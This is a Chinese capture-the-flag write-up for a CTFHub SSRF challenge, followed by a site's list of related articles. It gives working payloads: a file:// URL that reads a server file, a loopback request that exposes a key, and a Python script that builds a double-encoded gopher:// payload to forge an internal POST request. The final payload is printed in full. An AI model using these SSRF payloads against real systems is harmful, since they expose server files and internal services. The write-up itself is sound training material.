CTFHUB-SSRF-POST请求

通过file协议访问flag.php文件内容

复制代码
?url=file:///var/www/html/flag.php

右键查看页面源代码

需要从内部携带key发送post数据包即可获得flag

复制代码
?url=http://127.0.0.1/flag.php

得到了key

构造POST请求数据包,进行url编码(新建一个txt文件,输入以下内容保存,修改为python文件,重命名为gopher.py

python 复制代码
# -*- coding: utf-8 -*
import urllib.parse
payload =\
"""
POST /flag.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key=d554812847363980d21b2b1b87733501
"""
tmp = urllib.parse.quote(payload)
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://127.0.0.1:80/'+'_'+new
result = urllib.parse.quote(result)
print(result)

在命令行窗口执行

复制代码
python gopher.py

通过Gopher协议发送请求,得到了flag

复制代码
?url=gopher%3A//127.0.0.1%3A80/_%250D%250APOST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253Dd554812847363980d21b2b1b87733501%250D%250A
相关推荐
Tutankaaa26 分钟前
知识竞赛软件SaaS版 vs 本地部署
人工智能·经验分享·笔记·学习
许长安41 分钟前
RPC 异步调用基本使用方法:基于官方helloworld-async 示例
c++·经验分享·笔记·rpc
xiao阿娜的妙妙屋1 小时前
还在用轮播图当主图视频?2026年商家把视频做得更高级的AI工具推荐
经验分享
聚铭网络2 小时前
搞安全的谁还没点兜底绝活?——五一劳动节,致敬「网安劳动者」
网络安全
programhelp_4 小时前
Meta SDE 面经分享|VO 四轮高强度输出,系统设计追问非常深
经验分享·面试·职场和发展
我不是懒洋洋4 小时前
手写一个并查集:从原理到最小生成树实战
c语言·c++·经验分享·算法
图码5 小时前
一文搞懂如何判断字符串是否为Pangram(全字母句)
数据结构·算法·网络安全·数字雕刻·ping++
HackTwoHub5 小时前
可视化未授权访问批量探测工具、支持批量目标、并发扫描、SOCKS5 全局代理、CSV 导出
linux·windows·macos·网络安全·网络攻击模型
YOU OU7 小时前
网路原理(各层协议)
网络安全
旺仔Sec7 小时前
国光sqlsec_upload-labs靶场渗透测试通关解析教程总结
web安全·网络安全